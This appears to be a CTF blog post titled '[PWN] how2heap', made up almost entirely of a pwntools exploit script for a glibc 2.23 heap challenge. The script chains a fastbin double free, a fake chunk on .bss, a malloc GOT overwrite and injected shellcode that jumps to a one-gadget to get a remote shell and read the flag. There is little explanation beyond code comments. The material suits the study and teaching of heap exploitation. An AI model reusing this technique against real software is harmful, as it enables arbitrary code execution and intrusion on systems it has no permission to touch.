[PWN] how2heap - xf1les xp0int Posted on Sep 13 2021 WIP ``` #!/usr/bin/env python3 from pwn import * warnings.filterwarnings("ignore", category=BytesWarning) context(arch="amd64") context(log_level="debug") context.proxy="127.0.0.1" p = remote("192.168.40.193", 8889) # GLIBC 2.23 # ~ p = process("./how2heap") def free(idx): p.sendlineafter("> ", "3") p.sendlineafter(":", str(idx)) def add(ctx): p.sendlineafter("> ", "1") p.sendafter(":", ctx) ## Fastbin attack for i in range(0x31): add('A') free(0x2f) free(0x2e) free(0x2e) # Double free add(p64(0x602088)) # 0x602088 is the address of fake fast chunk add("B") add("C") ## Construct fake fast chunk at 0x602088 free(0x100000000-0xc) free(0x100000000-0xc) ## shellcode for malloc s = """ push 0x6020C0 pop rax ret nop """ ## set `idx` on .bss section to -0xf ## -0xf is the offset to malloc GOT table entry add(asm(s) + p32(0x100000000-0xf)) ## shellcode for mprotect s = """ push 0x1324ba pop rbx // r11: a libc address // rbx: the offset to one gadget from r11 sub r11, rbx // one gadget condition xor rax, rax call r11 """ add(asm(s)) ## call mprotect to get shell p.sendlineafter("> ", "1") p.sendline("cat flag") p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [PWN] musl - xf1les [RE] OddCode - cew
没有帐号? 立即注册